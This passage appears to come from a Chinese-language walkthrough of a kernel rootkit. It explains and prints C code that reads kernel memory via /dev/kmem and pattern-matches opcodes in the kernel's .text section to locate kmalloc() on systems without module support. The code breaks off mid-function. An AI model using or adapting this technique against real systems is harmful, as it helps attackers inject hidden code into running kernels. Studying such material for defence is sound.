pattern.c/get_kma():
    作用：通过模式匹配搜索kmalloc()函数的地址
    如果内核没有提供LKM支持，将使我们陷入困境。而且，这个问题的解决方法非常脏，也不是很好，
    但是看来还有效。我们将遍历内核的.text段，对如下指令进行模式查询：

    push GFP_KERNEL <something between 0-0xffff>
    push size <something between 0-0x1ffff>
    call kmalloc

    然后，把搜索结果收集到一个表中排序，出现次数最多的就是kmalloc()函数地址
   
    ulong    get_kma(int kmem, ulong pgoff, ulong *rgfp, ulong hint)
    {
    #define    KCALL    8192
    #define    KSIZE    (1024*1024*2)
    #define    BUFSZ    (1024*64)
    #define    MAXGFP    0x0fff
    #define    MAXSIZE    0x1ffff
       uchar    buf[BUFSZ+64];
       uchar    *p;
       ulong    pos;
       ulong    gfp, sz, call;
       kcall    kcalls[KCALL];
       int    c, i, ccount;

       gfp = sz = call = ccount = 0;

       for (pos = pgoff; pos < (KSIZE + pgoff); pos += BUFSZ) {
          c = rkm(kmem, buf, BUFSZ, pos);
          if (ERR(c)) break;
          /* 寻找push和call指令 */
          for (p = buf; p < (buf + c); ) {
             switch (*p++) {
                case 0x68:
                    gfp = sz;
                    sz = *(ulong *) p;
                    p += 4;
                    continue;
                case 0x6a:
                    gfp = sz;
                    sz = *p++;
                    continue;
                case 0xe8:
                    call = *(ulong *) p + pos +
                    (p - buf) + 4;
                    p += 4;
                    if (gfp && sz &&
                        gfp <= MAXGFP &&
                        sz <= MAXSIZE) break;
                default:
                    gfp = sz = call = 0;